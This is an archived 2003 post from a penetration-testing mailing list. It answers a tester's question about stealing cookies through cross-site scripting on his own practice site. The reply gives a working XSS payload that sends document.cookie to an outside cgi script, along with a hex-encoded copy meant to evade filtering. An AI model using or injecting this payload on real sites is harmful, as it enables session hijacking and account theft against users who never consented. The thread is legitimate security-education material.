Penetration Testing mailing list archives
RE: Proof of Concept Tool on Web Application Security
From: "Robert Auger" <rauger () spidynamics com>
Date: Mon, 14 Apr 2003 11:12:52 -0400
Now I am testing Cross-Site Scripting to steal the client cookies, or any other sensitive information. I am working on my own pen-test-testing site, which is vulnerable to XSS. I was able to display the cookies of the client
at
the victims machine, but that was not my goal, my goal is to get that
cookies
on my machine or any desired location. So is there any way by which I can transfer the victims cookie or any other information at my machine without interaction of the victim.
This is covered in the cross site scripting FAQ located at http://www.cgisecurity.com/articles/xss-faq.shtml. The relevant JavaScript code you are looking for is as follows (A example from the paper). <script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script> (IN HEX) %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e% 3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63% 67%69%2d%62%69%6e %2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63% 6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e (Note: This website has a public script that can be used for testing cookie theft.) Regards, Robert Auger SPI Labs -------------------------------------------------------------- Costs are climbing and complaints are rising as SPAM overloads your e-mail servers and Inboxes SurfControl E-mail Filter puts the brakes on spam & viruses and gives you the reports to prove it. http://www.securityfocus.com/SurfControl-pen-test2 Download a free trial and see just what's going in and out of your organization. --------------------------------------------------------------
Current thread:
- Proof of Concept Tool on Web Application Security Indian Tiger (Apr 10)
- Re: Proof of Concept Tool on Web Application Security Jörg Schütter (Apr 27)
- <Possible follow-ups>
- RE: Proof of Concept Tool on Web Application Security Einecker, Leah (Apr 11)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 11)
- RE: Proof of Concept Tool on Web Application Security Indian Tiger (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Nicolas Gregoire (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Robert Auger (Apr 14)
- Re: Proof of Concept Tool on Web Application Security Jon Pastore (Apr 16)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 14)
- RE: Proof of Concept Tool on Web Application Security Dawes, Rogan (ZA - Johannesburg) (Apr 16)
- RE: Proof of Concept Tool on Web Application Security Indian Tiger (Apr 24)
- For Indian Tiger - Pen test lab Sam (Apr 27)